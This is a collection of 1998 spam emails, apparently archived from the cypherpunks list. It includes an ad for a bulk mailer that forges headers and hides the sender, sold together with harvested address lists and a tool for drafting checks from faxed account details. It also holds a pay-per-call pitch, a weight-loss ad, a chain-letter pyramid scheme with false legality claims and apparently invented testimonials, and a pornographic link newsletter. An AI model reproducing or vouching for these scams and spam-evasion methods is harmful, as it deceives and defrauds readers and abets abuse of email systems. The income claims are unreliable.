Bulk Emailer's Dream Come True!!! - >>>GOLDRUSH STEALTH MASS MAILER<<< 

Connect to multiple mail servers (20 or more), make multiple connections to a single server or any combination of the two ( All Simultaneously ) with one single dial-up connection. 

SEND MULTIPLE SIMULTANEOUS MAILINGS... 

View complete details about your mailings. Shows each server your connected to, the status of that connection, how many messages are going out through that connection, etc...

We show you ALL the tricks all the mass e-mailers don't want you to know... 

Here are just a few features the GOLDRUSH STEALTH MASS MAILER offers to you... 

     *Forge the Header - Message ID - ISP's will Spin their wheels. 
     *Add's a Bogus Authenticated Sender to the Header. 
     *Add's a complete bogus Received From / Received By line with 
      real time / date stamp and recipient to the Header. 
     *Does NOT require a valid POP Account be entered in order to 
      send your mailings. 
     *Easy to use and operate 
     *Plus much more! 

All this, at speeds of up to 1,000's messages/hour
(28.8k modem). 

SPECIAL INTRODUCTORY PRICE... 

NOW YOU CAN HAVE BOTH THE FLOODGATE AND 
GOLDRUSH STEALTH MASS MAILER FOR JUST $499.00! 

UPDATE ... SAVE $149.05 AND ORDER NOW, BE ONE OF THE FIRST 100 ORDERS! 

Step up to the plate and play with the big boys TODAY and receive the COMPLETE 2 SOFTWARE PACKAGE for the unbelievably low price of ONLY $349.95! 

(Other bulk email software has sold for as much as $2,500 and can't even come close to the cutting edge technology of EASE, ACCURACY AND SPEED ... SPEED ... SPEED!) 

Try the Goldrush Stealth Mass Mailer & Floodgate Bulk Email Loader for 10 days FREE. 
And receive UNLIMITED technical support for 30 days.

**************************************************************

		MILLIONS OF  EMAIL ADDRESSES
	MILLIONS AND MILLIONS OF EMAIL ADDRESSES

CD with MILLIONS of email addresses separated by domain name.
All addresses are simple text format one per line. Addresses
from the following domains: Pipleline, MSN, MCI, Juno, Delphi,
Genie, AOL, Compuserve, Internet, .com & .net, MILLIONS OF THEM!
Not available on diskette or download.

===> WANT THE MILLIONS OF ADDRESSES FOR $100.00? <===

Just buy our Floodgate / Goldrush software package (with ALL
the bonuses INCLUDED), and the MILLIONS of addresses are yours
for just $100.00 additional.

These addresses will be delivered to you in simple text files
that any bulk emailing program can use, on CD Rom. With this CD,
YOU CAN BEGIN MAKING MONEY IMMEDIATELY!!!

***************************************************************

***SPECIAL BONUS #1:*** STOP Losing ISP Dial Up Accounts! 

If you order The FLOODGATE / GOLDRUSH software within the next 5 days - When you receive your program, you will also receive: 

*Complete instructions on "how to keep your dial up account from  showing up in the header", plus everything you will need to get started doing this. 

IMPORTANT NOTICE! We will initially only be offering 100 copies of the program for sale, First come / First Served basis only. We are doing this because of the extreme power that these programs offer.


***SPECIAL BONUS #2*** 

When you receive your two programs, you will also receive:
OVER 250 REPRINT AND RESELL RIGHTS REPORTS YOU CAN START TO MARKET
AND MAKE MONEY IMMEDIATELY!!! 

     These HOT sellers include: 
     1) How to Get a Top Rating in the Search Engines 
     2) 70 Money Making Reports 
     3) 75 MONEY MAKING PLANS & TRADE SECRETS and MUCH MUCH MORE!!!  
         ($200 RETAIL VALUE - FREE!!!) 


***SPECIAL BONUS #3***

With your two software programs, you will also receive our NEW "Address Grabber" utility program that enables you to grab 100's of THOUSANDS of email addresses from
newsgroups in minutes ($100 RETAIL VALUE - FREE).


***SPECIAL BONUS #4***

RECEIVE CHECKS BY EMAIL, PHONE OR FAX MACHINE. With this software
program, you can receive payment for your product or service INSTANTLY!!
There is no more waiting for your customers chec to arrive. This
software will no doubt, add to your sales, for customers who
don't have credit cards, as well as the impulse buyers.

With this software, you can print up your payments as soon as your
customer gives you his/her checking information. You will then
add the information given, to the proper blank check spaces, then
just print and go to the bank!!

         ***************************************************

To get your FREE demo and "test drive" our state-of-the-art software, 
visit our web site at:

		http://www.t-1net.com/floodgate 		

         ****************************************************

              HURRY ... RESERVE YOURS TODAY! 

So, if you are interested in taking advantage of the most powerful bulk 
email software in the world and start making money hand over fist.....

Print out the EZ ORDER form below and FAX or MAIL it to our office.

If you have any questions don't hesitate to call us at: 1-954-784-0312

SYSTEM REQUIREMENTS

386 or larger
Windows 95 OR Windows 3.1 with 8 meg ram
Extra 5 MB hard drive space

Floodgate & Goldrush can be run on a fast Mac with 24 MB RAM and SoftWindows.

NOTES FROM SATISFIED USERS

"It is everything you said it was. Within one week of my first mailing, I received a record number of orders. All you need to print money is a decent sales letter. Thanks." Randy albertson, Wolverine Capital.

"After using Floodgate and your utility program all day today, let me say these are as two of the finest programs I have ever bought in my 52 years! Your support has been superb. Thank You!" Vernon Hale, Prime Data Systems

"My first day and I just used Floodgate and Pegasus to send 1,469 sales letters. So far I've got about 25 positive responses. It works GREAT!!! Thanks." Donald Prior

"Floodgate is awesome!. I recently started a new business on-line. I stripped the addresses of the AOL & CIS classifieds. I sent out 3,497 email letters and got over 400 people to join my company in 5 days! Needless to say, it pays for itself." David Sheeham, OMPD

"I was able to use Floodgate to extract the names from the Internet news groups. It works perfectly. Needless to say, I am very excited about the use of this new technology." Mark Eberra, Inside Connections

"This is a great piece of software and an invaluable marketing tool." Joe Kuhn, The Millennium Group

"I just thought you'd like to know that this program is fantastic. After loading it on my system, I wanted to test it out. In my first hour of using this, I collected 6,092 email addresses!" Richard Kahn, LD Communications

"I just love the Floodgate program. It saves me hours and hours of time. This is the beginning of a wonderful FUN time marketing on-line. Thank you so much for writing this program." Beth O'Neill, Eudora, KS

"Your software is brilliant, and from the technical support I've received, I can see you have a genuine love and respect of people...Floodgate is a divine package. Wish I had found it sooner." Tom Sanders, Peoria, IL

"I really like the way the Floodgate software package works. It is very easy to use, and really does the trick. It has already saved me an incredible amount of time and energy." John Berning, Jr., Fairfield, NJ

"It's going great with FLOODGATE! I like using Delphi. I just collected 50,000+ addresses within 20 minutes on-line." Richard Kahn, R&B Associates

-------------------------------------------------
E-Z ORDER FORM:

Please print out this order form and fill in the blanks......
Please send order form and check or money order, payable to:

Dave Mustachi
P.O. Box 772261
Coral Springs, FL 33077-2261
(954) 784-0312


______Yes! I would like to try your cutting-edge software so that I can advertise my business to thousands of people on-line whenever I like! I understand that I have 10 days to trial the software. If I am not fully delighted, I will cheerfully be refunded the purchase price, no questions asked! Please rush me the FLOODGATE and GOLDRUSH package now!

______I am ordering within 72 hours! That qualifies me to receive the FLOODGATE and GOLDRUSH package at a substantial discount! I am ordering BOTH software packages for only $349.95. (Save $150 off the retail price....Software has sold for as much as $2,499.95)

______I am ordering within 72 hours! That qualifies me to receive UNLIMITED technical support for 30 days.

______I want to receive the package OVERNIGHT. I'm including $18.00 for shipping charges.

______I want to receive the package 2nd DAY. I'm including $10.00 (includes insurance & return receipt) for shipping charges.

______I'm ordering Floodgate / Goldrush software and want to order the MILLIONS of email addresses as well. My additional cost is $100.00 enclosed.

______I'm NOT ordering your Floodgate / Goldrush software, but I
want to order your MILLIONS of email addresses on CD. Enclosed is $249.00.

______I'm interested in reselling this unique software package, and earning $100.00
per sale. I understand YOU will be the technician for MY customers. Send me further
information. (You MUST purchase this program in order to be a reseller for the
Floodgate / Goldrush software package).

(CHECKS: ALLOW 1 WEEK FOR BANK CLEARANCE)


YOUR NAME_________________________________________________

COMPANY NAME_________________________________________________

YOUR POSITION_____________________________________________

STREET ADDRESS______________________________________________

CITY, STATE, ZIP____________________________________________

PHONE NUMBERS_______________________________________________

FAX NUMBERS_________________________________________________

EMAIL ADDRESSES_____________________________________________

************************************************************

We accept Checks, Money Orders, MasterCard, Visa,
American Express. You can either mail your order to 
us OR fax your order to:

			954-572-5837
************************************************************

Today's date:_____________
 
Visa____MasterCard____American Express____Discover_______
 
Card #:____________________________________________________
 
Expiration date:___________________________________________
 
Name on card:______________________________________________
 
Billing address:___________________________________________
 
Amount to be charged: $________________


Signature:___________________________________________


I agree to pay Dave Mustachi an additional $29 fee if my check is returned for insufficient or uncollectable funds.

SIGNATURE: X________________________________DATE:_______________

Please send all order forms and check or money order to payable to:

Dave Mustachi
P.O. Box 772261
Coral Springs, FL 33077
(954) 784-0312


***************************************************

OR:

PLEASE PASTE YOUR CHECK HERE

(If you fax a check, there is no need for you to send the original check by mail. We will draft up a new check, with the exact information from your original check that you faxed to us)

Please fax the above order form and check to: 1-954-572-58




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cash4u@polbox.com
Date: Sat, 3 Jan 1998 15:09:39 -0800 (PST)
Subject: Get into the pay per call industry for FREE
Message-ID: <199801032303.PAA21057@denmark.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Your e-mail address was taken from a post YOU left on a bulletin board or message board. Placing your address on such a medium indicates that you might be willing to receive mail from people who browse the internet. If you do not want receive this type of mailing, you might want to add your address to the remove list at one of the anti-spam web-sites.

=============================================

Hi, I'm sorry to intrude, but I had to share this with as many people as I could!
I have found a company that gives away the use of their pay per call services with no costs or lease for the lines!
I have several 900 lines for different services, and I am making some good coin from them, and now I want to help others get into the pay per call industry too.
The info I have will get you set up with the leading pay per call company in the US, and best of all...THERE ARE NO COSTS OR FEES!!

I am sending this note and asking for a 10.00 donation for the time it took me to find the info and get it to you, anyone willing to part with 10.00 will be a happy soul when they get their first check from their phone line or lines.
===============================================================

PROFITS ARE SOARING!!!
With 900, 800 and 011 Numbers
If you would like to make money while doing nothing...then this is the
business for you.
Programs are ready for you to choose from:
BBS Services
Live Adult 1-on-1 & 2-on-1 (Many Languages, Straight & Gay)
Recorded Fantasy Lines (Many Languages)
Datelines
Chat Lines
Live Psychic
Or create your very own program!
We have over 2000 Men & Women waiting for the phones to ring!!! We provide
24-hour service, answer your calls, and pay all phone company carrying
costs.

All you have to do is advertise! If you have an Internet Site this could
very well become your Primary Source of Income

Remember, the more people see your number, the more they'll call.The more
calls you get, the more money you make.
----------------------------------------------------------------------------
----
There are NO START UP COSTS or MONTHLY FEES with our 800 & 011 NUMBERS!!!!!
----------------------------------------------------------------------------
----
You may choose one of the following programs to start out with:
BBS
Live 1-on-1
Recorded Fantasy
Chat Line
Date Line
Gay 1-on-1
Psychic Line
Horoscope
----------------------------------------------------------------------------
----
To start your own business NOW, send $10.00 cash, certified check,  or money
order along with your e-mail address. I will e-mail all the info you need to get started
earning your dream income.

The $10.00 is the only cost you will ever have and it is just to cover my
time and effort, there will be no charge to set-up and manage your phone
system and you will be able to check your line's stats through a web page.
----------------------------------------------------------------------------
-----
Send your order to;
Rick Kowalski
617 Gateway Road
Winnipeg, Manitoba, Canada
R2K-2X8
NOTE that this is a real address, not a P. O. box. This is not a scam, the
info is free, but I will only send it if my efforts are rewarded.

Have a great day,
Rick









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NLYNCH4401@aol.com
Date: Sat, 3 Jan 1998 17:15:25 -0800 (PST)
To: Friend@public.com
Subject: SUZAN, YOUR MAIL
Message-ID: <199801040115.UAA02647@eola.ao.net>
MIME-Version: 1.0
Content-Type: text/plain


NEW YEARS RESOLUTION ....LOSING WEIGHT AND FEELING GREAT GET IN ON
THE ACTION OF THE NUMBER #1 SELLING PRODUCT IN CANADA AND SOON TO
BE SOLD WORLD WIDE.... IT'S CALLED CALORAD....LOSE WEIGHT AND INCHES
WITHIN JUST A SHORT COUPLE OF WEEKS OR WILL GIVE YOU YOUR MONEY
BACK!!!!!!
                        CALL 24 HOURS 1-800-669-0203


WANT TO GET A DATE OR OR TALK ABOUT LOSING WEIGHT THEN CALL OUR 
NEW AND IMPROVED DATING SERVICE IT'S LIVE IT'S AWESOME!!!!!
                       CALL 24 HOURS 1-888-232-1992





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MoneyTrain@mci2000.com
Date: Sat, 3 Jan 1998 22:47:35 -0800 (PST)
To: Friend@public.com
Subject: 1998: TOP PRIORITY!!!!!!!!!!
Message-ID: <199710022632NNA15968@post.net>
MIME-Version: 1.0
Content-Type: text/plain




 
</P><P ALIGN=CENTER> <FONT  COLOR="#800040" SIZE=4><B><< MAKE 1998 MORE FUN WITH MORE CASH!!!!
 
</P><P ALIGN=LEFT>   <FONT  COLOR="#800040" SIZE=3>PRINT OR SAVE THIS E-MAIL LIKE I DID.  
 
MANY PEOPLE ARE MAKING LOTS OF MONEY.  DON'T BE LEFT OUT.
 
 I just want to pass along my best wishes and encouragement to you. 
 Any doubts you have will vanish when your first orders come in.  I even
 checked with the U.S. Post Office to verify that the plan was legal.  
 It definitely is!  IT WORKS!!!
                                         Paul Johnson, Raleigh, NC

<FONT  COLOR="#800040" SIZE=4>
</P><P ALIGN=CENTER> 
 
 
 "Please Read This Twice!" 
 <FONT  COLOR="#800040" SIZE=3></B>
</P><P ALIGN=LEFT> Dear friend,
 
 =========================================================
 =========================================================
 This is a "ONE-TIME MESSAGE"  you were randomly selected to receive this. 
 There is no need to reply to remove, you will receive no further mailings from us.
 If you have interest in this GREAT INFORMATION,  please do not click reply, 
 use the contact information in this message.  Thank You! :-)
 =========================================================
 =========================================================
 
              *** Print This Now For Future Reference ***
 
 The following income opportunity is one you may be interested in taking a 
 look at. It can be started with VERY LITTLE investment and the income return
 is TREMENDOUS!!!  
 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 
You could make at least $50,000 in less than 90 days! Results may vary.
Please read the enclosed program...THEN READ IT AGAIN!!!

 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 
 
 This is a MONEY-MAKING PHENOMENON. PRINT this letter, read the 
 program...  THEN READ IT AGAIN !!!
 
 You are looking at the most profitable and unique program you may ever
 see.  It has demonstrated and proven ability to generate large sums of
 money.  This program is showing fantastic appeal with a huge and ever
 growing population which needs additional income.
 
 This is a legitimate LEGAL money-making opportunity.  It does not
 require you to come in contact with people, do any hard work, and best
 of all, you never have to leave the house, except to get the mail.  If you 
 believe that some day you will get that lucky break that you have been
 waiting for, THIS IS IT!  Simply follow the easy instructions, and your
 dream will come true!  This electronic multi-level marketing program works perfectly...100% EVERY TIME!
 
 Thousands of people have used this program to raise capital to start their
 own business, pay off debts, buy homes, cars, etc., even retire! This is
 your chance, so don't pass it up.
 
</P><P ALIGN=CENTER> <U><B>OVERVIEW OF THIS EXTRAORDINARY ELECTRONIC 
 MULTI-LEVEL MARKETING PROGRAM</U></B>
</P><P ALIGN=LEFT> 
 Basically, this is what we do:  We sell thousands of people a product for 
 $5.00 that costs us next to nothing to produce and e-mail.  As with all
 multi-level businesses, we build  our business by recruiting new partners
 and selling our products.  Every state in the U.S. allows you to recruit
 new multi- level business online (with your computer).
 
 The product in this program is a series of four businesses and financial
 reports.  Each $5.00 order you receive by "snail mail" will include the e-mail
 address of the sender.  To fill each order, you simply e-mail the product to
 the buyer.  THAT'S IT!...the $5.00 is yours!  This is the GREATEST
 electronic multi-level marketing business anywhere!
 
 FOLLOW THE INSTRUCTIONS EXACTLY!
 Let's face it, the profits are worth it!  THEY'RE TREMENDOUS!!!
 So go for it.  Remember the 4 points and we'll see YOU at the top!
 
 
         ******* I  N  S  T  R  U  C  T  I  O  N  S *******
 
 This is what you MUST do:
 
 1.  Order all 4 reports listed and numbered from the list below.
     For each report send $5.00 CASH, YOUR E-MAIL ADDRESS and YOUR
     RETURN POSTAL ADDRESS (in case of a problem) to each person listed.
     When you order, make sure you request each SPECIFIC report.  You
     will need all four reports, because you will be saving them on
     your computer and reselling them.
 
 2.  IMPORTANT--DO NOT alter the names, or their sequence other than
     instructed in this program! Or you will not profit the way you
     should.
 
     Replace the name and address under REPORT #1 with yours, moving
     the one that was there down to REPORT #2.  Move the name and
     address under REPORT #2 to REPORT #3.  Move the name and address
     under REPORT #3 to REPORT #4.  The name and address that was under
     REPORT #4 is dropped off the list and is NO DOUBT on the way to
     the bank.
 
     When doing this, please make certain you copy everyone's name and
     address ACCURATELY!!!  Also, DO NOT move the Report/Product
     positions!
 
 3.  Take this entire program text, including the corrected names list,
     and save it on your computer.
 
 4.  Now you're ready to start a massive advertising campaign on the
     WORLDWIDE WEB!  Advertising on the WEB is very, very inexpensive,
     but there are HUNDREDS of FREE places to advertise also.  Another
     avenue which you could use is e-mail mailing lists.  You can buy
     these lists for under $20/1,000 addresses.  START YOUR AD CAMPAIGN
     AS SOON AS YOU CAN.
 
 ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!!
 
</P><P ALIGN=CENTER> <FONT  COLOR="#800040" SIZE=4><U><B>REQUIRED REPORTS<FONT  COLOR="#800040" SIZE=3></U></B>
</P><P ALIGN=LEFT> 
 ***Order each REPORT by NUMBER and NAME***
 
 ALWAYS SEND  $5 CASH (concealed) FOR EACH ORDER REQUESTING THE SPECIFIC REPORT BY NAME AND NUMBER. ALWAYS SEND FIRST CLASS OR PRIORITY MAIL AND PROVIDE YOUR E-MAIL ADDRESS FOR QUICK DELIVERY.
 
___________________________________________________

REPORT #1       "HOW TO MAKE $250,000 THROUGH MULTILEVEL SALES"

ORDER REPORT #1 FROM:

  RICE ENTERPRISES
  14001 DALLAS PKWY, STE. 1200
  DALLAS, TX   75240
___________________________________________________

REPORT #2  "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:

  MARK KITCHEN
  3440 WATKINS LAKE ROAD
  WATERFORD, MI  48328
___________________________________________________
 REPORT #3   "SOURCES FOR THE BEST MAILING LISTS"

 ORDER REPORT #3 FROM:

  MAKIN-MOOLA
  P.O. BOX 271926
  FT. COLLINS, CO  80527-1926
 _____________________________________________________
 REPORT #4   "EVALUATING MULTI-LEVEL SALES PLANS"

 ORDER REPORT #4 FROM:
     
  MY-TURN
  P.O. BOX 272453
  FORT COLLINS, CO  80527-2453
 ____________________________________________________


</P><P ALIGN=CENTER> <B>HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$</B>
</P><P ALIGN=LEFT> 

 Let's say you decide to start small just to see how it goes.  Assume
 your goal is to get 10 people to participate on your first level.
 (Placing a lot of FREE ads on the internet could EASILY get a better
 response.)  Also assume that everyone else in YOUR BUILDING ORGANIZATION
 gets ONLY 10 downline members.  Follow this example for the STAGGERING
 results below.
 
 <B>1st level --  your 10 members with $5  ($5 x 10)                $50
 2nd level --10 members from those 10 ($5 x 100)                   $500
 3rd level -- 10 members from those 100 ($5 x 1,000)           $5,000
 4th level -- 10 members from those 1,000 ($5 x 10,000)     $50,000</B>
                                 <FONT  COLOR="#800040" SIZE=4><B>THIS TOTALS----------->       $55,550<FONT  COLOR="#800040" SIZE=3></B>
 
 Remember friends, this is assuming that the people who participate
 only recruit 10 people each.  Dare to think for a moment what would
 happen if everyone got 20 people to participate!  Some people get
 100's of recruits!  THINK ABOUT IT!
 
 By the way, your cost to participate in this is practically nothing.
 You obviously already have an internet connection and email is FREE!!!
 REPORT#3 will show you the best methods for bulk emailing and purchasing
 email lists.
 
 REMEMBER:  Approx. 105,000 new people get online monthly!
 
</P><P ALIGN=CENTER> <FONT  COLOR="#800040" SIZE=4><U><B>ORDER YOUR REPORTS NOW!!!<FONT  COLOR="#800040" SIZE=3></U></B>
</P><P ALIGN=LEFT>   
 
 
</P><P ALIGN=CENTER> <B>*******TIPS FOR SUCCESS*******</B>
</P><P ALIGN=LEFT> 
 TREAT THIS AS YOUR BUSINESS!  Send for the four reports IMMEDIATELY,
 so you will have them when the orders start coming in because:
 When you receive a $5 order, you MUST send out the requested product/
 report to comply with the U.S. Postal & Lottery Laws, Title 18,
 Sections 1302 and 1341 or Title 18, Section 3005 in the U.S. Code,
 also Code of Federal Regs. vol. 16, Sections 255 and 436, which
 state that "a product or service must be exchanged for money received."
 
 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.
 
 *  Be patient and persistent with this program.  If you follow the
    instructions exactly the results WILL undoubtedly be SUCCESS!
 
 *  ABOVE ALL, HAVE FAITH IN YOURSELF THAT YOU CAN SUCCEED!
 
 
</P><P ALIGN=CENTER> <B>*******YOUR SUCCESS GUIDELINE*******</B>
</P><P ALIGN=LEFT> 
         The check point that guarantees your success is simply this:
 You MUST receive 10 to 20 orders for REPORT #1!  THIS IS A MUST!  If
 you don't within two weeks, advertise more and send out more programs
 until you do.  Then, a couple of weeks later you should receive at
 least 100 orders for REPORT #2.  If you don't, advertise more and send
 out more programs until you do.  Once you have received 100, or more
 orders for REPORT #2, YOU CAN RELAX, because you will be on your way
 to the BANK!  -OR-  You can DOUBLE your efforts!
 
 REMEMBER:  Every time your name is moved down on the list you are in
 front of a DIFFERENT report, so you can KEEP TRACK of your PROGRESS
 by what report people are ordering from you. IT'S THAT EASY!!!
 
 NOTE:  IF YOU NEED HELP with starting a business, registering a business
 name, how income tax is handled, etc., contact your local office of the Small Business Administration (a Federal agency) for free help and answers to
 questions.  Also, the Internal Revenue Service offers free help via telephone
 and free seminars about business taxes.
 
 
 
         <FONT  COLOR="#800040" SIZE=4><B>******* T  E  S  T  I  M  O  N  I  A  L  S *******<FONT  COLOR="#800040" SIZE=3></B>
 
This 4 report program has turned my life completely around. Have you ever
been in debt over $100,000? It's a scary feeling. You consider bankruptcy,
you consider all kinds of crazy schemes to make money and you dump alot of
the little you have left into many of them. I have spent thousands of
dollars on seminars and courses. I think I must own at least half of the
books ever published on making money. Some are helpful, most are not. This
program came across my desk numerous times, both through the post and via
email over the years. I think I must have been pretty desperate when I
finally broke down and really read through the letter. After all I had been
through, suddenly a little light went on! This thing could really work?
After all I spent on trying to learn how to get myself out from under this
debt load this plan was only going to cost me $20 plus some of my time. I
already had a computer and email, so........

This is getting too long, so let me finish up here. I have now started on
my fourth time through the program! That $100,000 debt is GONE! I can talk
to my friends and relatives now and they don't cringe for fear I'm going to
ask for money. We are starting to build our business up and we have the
capital to do it now! I have chosen the year 2000 for our retirement and
I'm going to make it with time to spare.

Does this plan work? Yes, yes, a thousand times yes!
    
                                         J. S. Todd
                                         Canada

 This program does work, but you must follow it EXACTLY! Especially the
 rule of not trying to place your name in a different position, it won't work,
 you'll lose a lot of money.  I'm living proof that it works.  It really is a great
 opportunity to make relatively easy money, with little cost to you.  If you
 do choose to participate, follow the program exactly, and you'll be on your
 way to financial security.  If you are a fellow Christian and are in financial
 trouble like I was, consider this a sign.  I DID!
                                         Good Luck & God Bless You,
                                         Sincerely, Chris Johnson
 
 P.S.  Do you have any idea what 11,700 $5 bills ($58,500) looks
 like piled up on the kitchen table?...IT'S AWESOME!
 
         My name is Frank.  My wife Doris and I live in Bel-Air, MD.
 I am a cost accountant with a major U.S. Corporation and I make
 pretty good money.  When I received the program I grumbled to Doris
 about receiving "junk mail"!  I made fun of the whole thing, spouting
 my knowledge of the population and percentages involved.  I "knew" it
 wouldn't work.  Doris totally ignored my supposed intelligence and
 jumped in with both feet.  I made merciless fun of her, and was ready
 to lay the old "I told you so" on her when the thing didn't work...
 well, the laugh was on me!  Within two weeks she had received over 50
 responses.  Within 45 days she had received over $147,200 in $5 bills!
 I was stunned.  I was sure that I had it all figured and that it wouldn't 
 work...I AM a believer now.  I have joined Doris in her "little" hobby. I did
 have seven more years until retirement,  but I think of the "rat race" and
 it's not for me...We owe it all to MLM.
                                         Frank T., Bel-Air, MD
 
 This is the only realistic money-making offer I've ever received.  I 
 participated because this plan truly makes sense. I was surprised
 when the $5.00 bills started filling my mail box. By the time it tapered
 off I had received over 8,000 orders with over $40,000 in cash.  Dozens
 of people have sent warm personal notes too, sharing the news of their
 good fortunes!  It's been WONDERFUL.
                                         Carl Winslow Tulsa, OK
 
 The main reason for this letter is to convince you that this system is
 honest, lawful, extremely profitable, and is a way to get a large amount
 of money in a short time.  I was approached several times before I checked
 this out.  I joined just to see what one could expect in return for the minimal
 effort and money required.  Initially I let no one in the organization know
 that I was an attorney and, to my astonishment, I received $36,470.00 in
 the first 14 weeks, with money still coming in.
                                 Sincerely yours, Phillip A. Brown
 
 This plan works like GANG-BUSTERS!! So far I have had 9,735 total orders
 OVER $48,000!!!  I hope I have sparked your own excitement, if you follow
 the program exactly, you could have the same success I have, if not better.
 Your success is right around the corner, but you must do a little work.
                                         Good Luck!  G. Bank
 
         Not being the gambling type, it took me several weeks to make
 up my mind to participate in this plan.  But conservative that I am
 I decided that the initial investment was so little that there was
 just no way that I wouldn't get enough orders to at least get my money
 back.  Boy I was surprised when I found my medium-size post office box
 crammed with orders.  After that it got so over-loaded that I had to
 start picking up my mail at the window.  I'll make more money this
 year than any 10 years of my life before.  The nice thing about this
 deal is that it doesn't matter where in the U.S. the people live.
 There simply isn't a better investment with a faster return.
                                 Mary Rockland, Lansing, MI
 
         I had received this program before.  I deleted it, but later
 I wondered if I shouldn't have given it a try.  Of course, I had no
 idea who to contact to get another copy, so I had to wait until I
 was e-mailed another program...11 months passed then it came...I
 didn't delete this one!...I made $41,000 on the first try!!
                                         D. Wilburn, Muncie, IN
 
         This is my third time to participate in this plan.  We have
 quit our jobs, and quite soon we will buy a home on the beach and live
 off the interest on our money.  The only way on earth that this plan
 will work for you is if you do it.  For your sake, and for your family's
 sake don't pass up this golden opportunity.  Remember, when you order
 your four reports, SEND CASH.  Checks have to clear the bank and create
 too many delays.  Good luck and happy spending!
                                         Charles Fairchild, Spokane, WA
 
         Typically when I look at a money-making deal I want to
 know if the company is strong, will it be here when it's time for
 my big pay off.  In this crazy thing there is no company intervention
 for management to blow it.  Just people like me ordering directly
 from the source!  Interesting...I had a couple of projects I'd been
 trying to fund to no avail so I thought; Why not give it a try?  Well
 2 1/2 weeks later the orders started coming in.  One project is funded
 and I'm sure the other will be soon!
                                         Marilynn St. Claire, Logan, UT
 
 ====================================================
 
</P><P ALIGN=CENTER> <B>We could be printing YOUR testimonial next!!!</B>  
 
 <FONT  COLOR="#800040" SIZE=4><B>ORDER YOUR REPORTS TODAY AND GET
 STARTED DOWN THE ROAD TO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sun, 4 Jan 1998 01:17:41 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sun Jan 4 '98
Message-ID: <19980104081931.15721.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Sunday's issue of Eureka!

PUSSY PARADISE
Yet again Eureka! has managed  to negotiate a special week's
free access  to one of the web' s premier porn sites.  Pussy
Paradise is simply  packed with 100s  of videos (many live),
thousands of photos,  and so much more.  You will  need your
credit card as adult verification but it will not be charged
for your free week! So check it out - there's smut a plenty!
Pussy Paradise .... http://www.pussyparadise.com/eureka.html

GAYEUREKA!
NEW!! The new gay newsletter  is now available.  All the gay
material from this newsletter and a whole load more will now
appear in the new newsletter. If you would like to subscribe
Please click here ..... http://eureka.abc-web.com/gayeureka/

EUREKA! is now  available in three additional languages.  So
now you can choose from any of the following. And don't for-
get, from January 10th we'll add Portuguese and Italian too!
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm

ANDREA'S FEMMES
"Welcome, my name is Andrea. It makes me so hot knowing that
you're looking my girls.  I just can't keep my hands off my-
self  thinking  about you looking at them.  Enjoy these pic-
tures..."  You have to see these pix!  Lots, good  and free!
Andrea's Femmes ...... http://www.latent-images.com/andreas/

ANGIE'S BIG BEAUTIFUL WOMEN
Big ladies, I'm  talking really huge!  That's right, packing
some serious chub.  The site  warrants a peek.  Ya gotta see
the "rock road" picture of the nipple  tug.  Ouch!  Surf it.
Angie's Big .................. http://www.waid.com.au/angie/

ABSOLUTE PORN
Well I guess so!  Lots  of easy to get at fast  loading free
pix!  Hot horny looking babes  abound.  The pix are all over
and there's also a link to thumbnails. Worth the Surf! Yeah!
Absolute Porn .... http://www.algonet.se/~ctwr/absoluteporn/

STUDMONKEY'S OBSESSIONS
Choose your obsession, anal or lesbian. Once at that destin-
ation you have  more choices and some great pix of steamy 69
action!  The pix are big and pretty good quality.  Ohh Yeah!
Studmonkey's Obsessions ......... http://www.studmonkey.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Pregnant ....................... http://207.168.184.26/preg/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
ALEXIS: This Georgia peach is a tiny topper. With a tiny 34A
chest she is  perfect for  all you guys who  like them tiny!
Nothing turns her on more than  a strong,  confident man who
is not afraid to show his sensitive side.  Her hobbies incl-
ude "anything with water",  she loves to water ski.  See her
in and out of her bikini! .. http://amateurindex.com/eureka/

TODAY'S FREE PIX
OK,  it's the new year, and now we are really going to start
getting in gear,  with some of the hottest FREE photos ever!
Pic  1 ........................... http://137.39.63.229/?040
Pic  2 ........................... http://137.39.63.229/?041
Pic  3 ........................... http://137.39.63.229/?042
Pic  4 ........................... http://137.39.63.229/?043
Pic  5 ........................... http://137.39.63.229/?044
Pic  6 ........................... http://137.39.63.229/?045
Pic  7 ........................... http://137.39.63.229/?046
Pic  8 ........................... http://137.39.63.229/?047
Pic  9 ........................... http://137.39.63.229/?048
Pic 10 ........................... http://137.39.63.229/?049

PLEASE VISIT THIS FINE EUREKA! MEMBER SITE
THE ULTIMATE HARDCORE SITES
http://sexplosion.com/adverts.shtml
An incredible collection of over 30 sites featuring the
hottest free hardcore photos. The pix are easy to find and
the sites are all very accessible. You won't be
disappointed.

------------------------------------------------------------
